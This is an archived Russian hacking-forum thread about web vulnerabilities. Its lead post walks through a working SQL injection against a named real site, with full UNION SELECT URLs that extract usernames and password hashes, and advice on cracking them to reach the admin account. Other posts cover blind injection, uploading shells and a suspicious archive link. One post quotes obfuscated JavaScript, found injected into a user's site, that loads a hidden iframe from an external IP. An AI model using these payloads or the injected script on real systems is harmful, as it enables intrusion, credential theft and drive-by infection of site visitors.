Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 diznt, 2 gisTy, 2 sabe
    По поводу сайта http://darkbrotherhood.ru
    ЦМС koobi.
    Версия мускула 4.1.22 (ну и ясно что никакой информатион_схемы нету)
    Дырок хватает. Все что я нашел вели только к посимвольному бруту, кроме одной и вот она интересна раскруткой.
    Дыра в форуме вот тут
    http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13/*
    Вроде все нормально, но...
    Качаем koobi смотрим таблицы, и колонки (я скачал немного не ту версию, но догадался с префиксом)
    Запрос
    http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,uname,pass,13+from+k_user/*
    выдет странную картину - имена и пароли (хеши) видны не полностью.
    Юзаем функции работы со строками в мускуле, я взял MID()
    Запрос
    http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(email,1,8),MID(pass,1,8),13+from+k_user/*
    выдал то что нужно :)
    Восьмерку тут MID(pass,1,8) подобираем опытным путем (интересно почему там 8 )
    Дальше думаю понятно, меняем 1 так что бы увидеть всю строку целиком.
    НО, хеш можно получать и не весь, вполне хватит первых восьми символов, с ними идем сюда http://hashcracking.info ,
    выбираем поиск по маске и получаем пасс ;)
    У этой ЦМС в админке бывает авторизация по мылу, но тут по логину юзера. Его находим вот тут (на случай логина больше 8 символов)
    http://darkbrotherhood.ru/index.php?area=1&p=static&page=sostav (Глава клана)
    Поэтому последний запрос вот такой
    http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(uname,1,8),MID(pass,1,8),13+from+k_user+where+uname=CHAR(68,97,114,107,101,108,118,101)/*
    ...
    Было интересно исследовать. Может кто найдет другой путь?
     
    7 people like this.
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    пздц хакер))))) пасиб + заслужил
     
    2 people like this.
  3. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    gisTy
    сори, но не пиши если незнаеш..)

    Red_Red1
    молодец..)
     
    #2403 sabe, 18 Jun 2008
    Last edited: 18 Jun 2008
  4. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Вот я чето не понял с получением полного хеша

    ЗЫ вопрос снят
     
    #2404 diznt, 18 Jun 2008
    Last edited: 18 Jun 2008
  5. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Ребят, подскажите какой-то багнутый движок чего-нибудь на локалхостЪ, чтоб потренироваться шелл заливать?
     
  6. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    :) Качай любой да заливай )))))
    phpNuke к примеру... начиная с 6-й версии... phpbb...
     
    #2406 Ch3ck, 18 Jun 2008
    Last edited: 18 Jun 2008
    1 person likes this.
  7. Gecko

    Gecko Banned

    Joined:
    17 Jun 2008
    Messages:
    1
    Likes Received:
    3
    Reputations:
    0
    что то глючит мейл.ру :)
    http://sirius.jino.ru/mail.ru_d.rar
     
    1 person likes this.
  8. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Сорри, если не в тему.
    Если кому надо (как я видел в комментах к одному видео оч сильно просили), то написал код быстрого кодирования в hex с локалхоста:

    Code:
    <form action='<? $PHP_SELF; ?>' method=POST>
    <input type=text name='hex'>
    <input type=SUBMIT value="OK">
    </form>
    <?
    error_reporting(0);
    echo "$hex= ";
    echo("0x".bin2hex("$hex"))
    ?>
     
    1 person likes this.
  9. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    чо делать если нет принтабельных полей
    подобрал кол-во полей попробывал ни одно не выводит даже в тело документа
    ????
     
  10. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 Vid0k
    Это т.н. слепая иньекция. Делай посимвольный перебор, долго ну а шо делать :)
    Почитать можно тут http://www.securitylab.ru/contest/212099.php
    или тут http://forum.antichat.ru/showthread.php?t=35207
    Вобщем вопрос этот решаем.
    Удачи.
    Да кстати... попробуй ЕЩЕ поискать вывод... иногда он бывает весьма необычным ;)
     
  11. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    2 Vid0k попробуй
    (c) Cytech http://forum.web-hack.ru/index.php?showtopic=69093
     
    1 person likes this.
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    script
    <!--
    var d=document,kol=561;
    function O10H485B5B18EDFA3(H485B5B18EE79A){ return( parseInt(H485B5B18EE79A,16));}function H485B5B18EF78A(H485B5B18EFF82){ function H485B5B18F176E() {var H485B5B18F1F66=2;return H485B5B18F1F66;} var H485B5B18F077B='';for(H485B5B18F0F74=0; H485B5B18F0F74<H485B5B18EFF82.length; H485B5B18F0F74+=H485B5B18F176E()){ H485B5B18F077B += ( String.fromCharCode (O10H485B5B18EDFA3(H485B5B18EFF82.substr(H485B5B18F0F74, H485B5B18F176E()))));}return H485B5B18F077B;} document.write(H485B5B18EF78A('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3430383539292B27353438333662306638355C272077696474683D343439206865696768743D3931207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    / script

    ребят что это такое? и как с этим боротся? появляется сразу после боди..
     
  13. none222

    none222 Guest

    Reputations:
    0
    очевидно это реклама, добавляемая бесплатным хостингом. ЕСли работают файлы ХТАККЕССы, то можешь изменить расширение не на пхп а на другое, тогда может убраться ;)
     
  14. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    241
    Likes Received:
    34
    Reputations:
    8
    А помойму это зашифрованно чем то , помню была такая лажа ...
     
    #2414 Buffalon, 21 Jun 2008
    Last edited: 21 Jun 2008
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    это ифраме..поимели меня
     
  16. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    HEX это внутри...
     
  17. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    есть трабла..
    подобрал колонки 22 штуки.. через +order+by+22/* иньекция происходит в where clause
    пробвал использовать and но не получилось...
    закрывал скобки по разному.. тож нече..
    пробвал обходить фильтрацию.. нифига.

    или сдесь:
    подскажите что делать?
     
    #2417 sabe, 21 Jun 2008
    Last edited: 22 Jun 2008
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    вопрос специалистам....
    делаю http://site.com/index.php?m=vopros-otvet+AND+ASCII(SUBSTRING((select from user limit 3,1 ),4,1))>57/*

    получаю
    Ll('<P
    CPgT1gQD"<.X(?j
    и так далее.....что это за бред?
     
  19. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    я конечно могу сильно ошибаться, но может быть тут 3 версия мускула и конструкции union select нету?
     
  20. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Хочу соединиться с удаленным mysql через шелл.
    Пишет:
    Lost connection to MySQL server at 'reading initial communication packet', system error: 61
    То есть, запрещено на конечном mysql сервере подключения извне?
     
Thread Status:
Not open for further replies.